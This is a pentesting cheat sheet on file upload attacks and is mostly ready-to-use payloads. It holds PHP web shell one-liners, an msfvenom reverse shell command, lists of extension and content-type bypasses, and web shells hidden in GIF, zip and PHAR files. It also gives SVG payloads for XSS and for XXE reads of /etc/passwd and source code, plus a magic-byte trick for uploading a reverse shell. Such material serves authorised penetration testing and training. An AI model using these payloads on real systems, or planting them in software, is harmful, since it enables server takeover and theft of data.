# File Upload Pentesting

## PHP Upload Payloads (one liners)

```php
<?php file_get_contents('/etc/passwd'); ?>	
<?php system('hostname'); ?>	
<?php system($_REQUEST['cmd']); ?>
<% eval request('cmd') %>
msfvenom -p php/reverse_php LHOST=OUR_IP LPORT=OUR_PORT -f raw > reverse.php
```

## PHP Code (Much better Output of RCE)

Use this code in a file

```php
<?php if(isset($_REQUEST['cmd'])){ $cmd = ($_REQUEST['cmd']); system($cmd); die; }?>
```

## PHP File Extensions For Burp Intruder

```php
.jpeg.php
.jpg.php
.png.php
.php
.php3
.php4
.php5
.php7
.php8
.pht
.phar
.phpt
.pgif
.phtml
.phtm
.php%00.gif
.php\x00.gif
.php%00.png
.php\x00.png
.php%00.jpg
.php\x00.jpg
```

## Content Types For File Upload

```python
image/bmp
image/cgm
image/g3fax
image/gif
image/ief
image/jpeg
image/ktx
image/pjpeg
image/png
image/prs.btif
image/svg+xml
image/tiff
image/vnd.adobe.photoshop
image/vnd.dece.graphic
image/vnd.djvu
image/vnd.dvb.subtitle
image/vnd.dwg
image/vnd.dxf
image/vnd.fastbidsheet
image/vnd.fpx
image/vnd.fst
image/vnd.fujixerox.edmics-mmr
image/vnd.fujixerox.edmics-rlc
image/vnd.ms-modi
image/vnd.net-fpx
image/vnd.wap.wbmp
image/vnd.xiff
image/webp
image/x-citrix-jpeg
image/x-citrix-png
image/x-cmu-raster
image/x-cmx
image/x-freehand
image/x-icon
image/x-pcx
image/x-pict
image/x-png
image/x-portable-anymap
image/x-portable-bitmap
image/x-portable-graymap
image/x-portable-pixmap
image/x-rgb
image/x-xbitmap
image/x-xpixmap
image/x-xwindowdump
application/vnd.3lightssoftware.imagescal
application/vnd.fastcopy-disk-image
application/vnd.imagemeter.folder+zip
application/vnd.imagemeter.image+zip
application/vnd.msa-disk-image
application/vnd.oci.image.manifest.v1+json
image/aces
image/avci
image/avcs
image/dicom-rle
image/emf
image/example
image/fits
image/heic
image/heic-sequence
image/heif
image/heif-sequence
image/hej2k
image/hsj2
image/jls
image/jp2
image/jph
image/jphc
image/jpm
image/jpx
image/jxr
image/jxra
image/jxrs
image/jxs
image/jxsc
image/jxsi
image/jxss
image/ktx2
image/naplps
image/prs.pti
image/pwg-raster
image/t38
image/tiff-fx
image/vnd.airzip.accelerator.azv
image/vnd.cns.inf2
image/vnd.globalgraphics.pgb
image/vnd.microsoft.icon
image/vnd.mix
image/vnd.mozilla.apng
image/vnd.pco.b16
image/vnd.radiance
image/vnd.sealed.png
image/vnd.sealedmedia.softseal.gif
image/vnd.sealedmedia.softseal.jpg
image/vnd.svf
image/vnd.tencent.tap
image/vnd.valve.source.texture
image/vnd.zbrush.pcx
image/wmf

```

## LFI and File Upload to RCE&#x20;

### Crafting Malicious Image

we can create a malicious image and then try to get RCE

```python
echo 'GIF8<?php system($_GET["cmd"]); ?>' > shell.gif
```

### ZIP Upload To RCE

We can utilize the [zip](https://www.php.net/manual/en/wrappers.compression.php) wrapper to execute PHP code. However, this wrapper isn't enabled by default, so this method may not always work. To do so, we can start by creating a PHP web shell script and zipping it into a zip archive (named `shell.jpg`), as follows:

```python
echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php
```

### PHAR Upload

we can use the `phar://` wrapper to achieve a similar result. To do so, we will first write the following PHP script into a `shell.php` file:

```php
<?php
$phar = new Phar('shell.phar');
$phar->startBuffering();
$phar->addFromString('shell.txt', '<?php system($_GET["cmd"]); ?>');
$phar->setStub('<?php __HALT_COMPILER(); ?>');

$phar->stopBuffering();
```

This script can be compiled into a `phar` file that when called would write a web shell to a `shell.txt` sub-file, which we can interact with. We can compile it into a `phar` file and rename it to `shell.jpg` as follows:

```shell-session
php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg
```

Now, we should have a phar file called `shell.jpg`. Once we upload it to the web application, we can simply call it with `phar://` and provide its URL path, and then specify the phar sub-file with `/shell.txt` (URL encoded) to get the output of the command we specify with (`&cmd=id`)

## File Uplaod to XSS

### SVG File Upload to XSS

```xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert("XSS by Programmerboy");
  </script>
</svg>
```

## SVG Upload to File Read

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<svg>&xxe;</svg>


using php filter

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
<svg>&xxe;</svg>
```

## SVG File Upload to RCE

apped Reverse shell php one liner at the end of the svg payload

```svg
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=upload.php"> ]> <svg>&xxe;</svg> <?php system($_REQUEST['cmd']); ?>
```

<figure><img src="https://3420091786-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fy1ZUO45eHY8aMCLJ7OiN%2Fuploads%2FxodiK5jknzhRdT61kfmw%2Fimage.png?alt=media&#x26;token=24670e7f-5fee-4d1a-8e14-f0bc6b4858f5" alt=""><figcaption></figcaption></figure>

## Magic Bytes

Sometimes there is a strong filter on the file extension when we are uploading files , we can try to bypass that using magic bytes, which means that i will upload the file extension which is required by the server and then i will add the magic byte in the beginning and rest of the file will be my reverse shell and in that case i will get a reverse shell back.

<figure><img src="https://3420091786-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fy1ZUO45eHY8aMCLJ7OiN%2Fuploads%2Frz4YbQbB3rG9rzpe5gfm%2Fimage.png?alt=media&#x26;token=751b248b-c0b6-4db6-afff-13228c4c9c9d" alt=""><figcaption><p>i am not allowed to upload any files except pdf files</p></figcaption></figure>

now i will add the pdf magic byte in the beginning and rest of it will be a reverse shell

<figure><img src="https://3420091786-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fy1ZUO45eHY8aMCLJ7OiN%2Fuploads%2FDxbeIdzs7og1KRvQrmG0%2Fimage.png?alt=media&#x26;token=0018d330-014b-4a84-a30b-b2ce1cc4c7f6" alt=""><figcaption><p>sometimes 1.4 works for pdf files</p></figcaption></figure>

<figure><img src="https://3420091786-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fy1ZUO45eHY8aMCLJ7OiN%2Fuploads%2FqYqGZZNpCYLiaX1KWrhT%2Fimage.png?alt=media&#x26;token=b66e8e5c-b628-4042-91e7-95346f625587" alt=""><figcaption><p>sometimes 1.3 works for pdf files</p></figcaption></figure>

<figure><img src="https://3420091786-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fy1ZUO45eHY8aMCLJ7OiN%2Fuploads%2F69lKk0NW41FeJB1EYvOJ%2Fimage.png?alt=media&#x26;token=f8a46ad9-60ef-432c-a8a8-5bdc57f957e0" alt=""><figcaption><p>Successfully file got uploaded containg aspx rev shell </p></figcaption></figure>

now find the file where is is uploading and try to get a reverse shell